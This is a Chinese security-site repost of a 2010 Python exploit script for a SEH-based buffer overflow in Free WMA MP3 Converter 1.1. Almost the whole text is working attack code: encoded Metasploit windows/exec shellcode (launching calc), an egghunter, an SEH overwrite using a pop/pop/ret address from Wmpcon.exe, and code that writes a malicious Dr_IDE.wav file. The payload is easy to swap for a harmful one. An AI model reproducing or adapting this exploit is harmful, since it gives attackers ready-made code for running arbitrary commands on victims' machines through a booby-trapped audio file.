Free WMA MP3 Converter 1.1 Buffer Overflow Exploit (SEH)

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Free WMA MP3 Converter 1.1 Buffer Overflow Exploit (SEH)

来源：http://pocoftehday.blogspot.com 作者：Dr_IDE 发布时间：2010-11-15

#!/usr/bin/env python
##############################################################################
#
# Free WMA MP3 Converter 1.1 Buffer Overflow Exploit (SEH)
# Coded By:     Dr_IDE
# Date:         November 10, 2010
# Download:     http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm
# Tested on:    Windows XPSP3
# Greets:       edb team
# Notes: Egghunter was for fun, not required though.
#
###############################################################################

# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
# Egg is already injected
code=(
"\x80\x87\x78\x68\x80\x87\x78\x68\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43"
"\x4a\x4a\x49\x4b\x4c\x4a\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51"
"\x55\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50"
"\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a\x4b\x51\x59\x4c\x4b\x50"
"\x34\x4c\x4b\x43\x31\x4a\x4e\x46\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49"
"\x50\x42\x54\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c\x4b\x51\x4f\x47"
"\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45"
"\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51"
"\x4c\x46\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50\x56\x42"
"\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x44\x30\x45"
"\x4c\x4e\x4d\x4c\x4b\x43\x58\x45\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42"
"\x4a\x50\x50\x43\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43\x51\x42\x4c\x42"
"\x43\x43\x30\x41\x41")

eggy=(
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x80\x87\x78\x68\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

nops=("\x90" * 8)
nseh=("\xEB\x06\x90\x90")
rseh=("\xEF\xF7\x4A\x00") #Universal P/P/R - Wmpcon.exe
buf1=("\x41" * 1000)
buf2=("\x42" * (4116 - len(buf1+nops+code)))
junk=("\x43" * (8000 - len(buf1+buf2+nseh+rseh)))

evil=(buf1+nops+code+buf2+nseh+rseh+nops+eggy+junk);

f1 = open('Dr_IDE.wav','w');
f1.write(evil);
f1.close();

#[http://pocoftehday.blogspot.com]

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告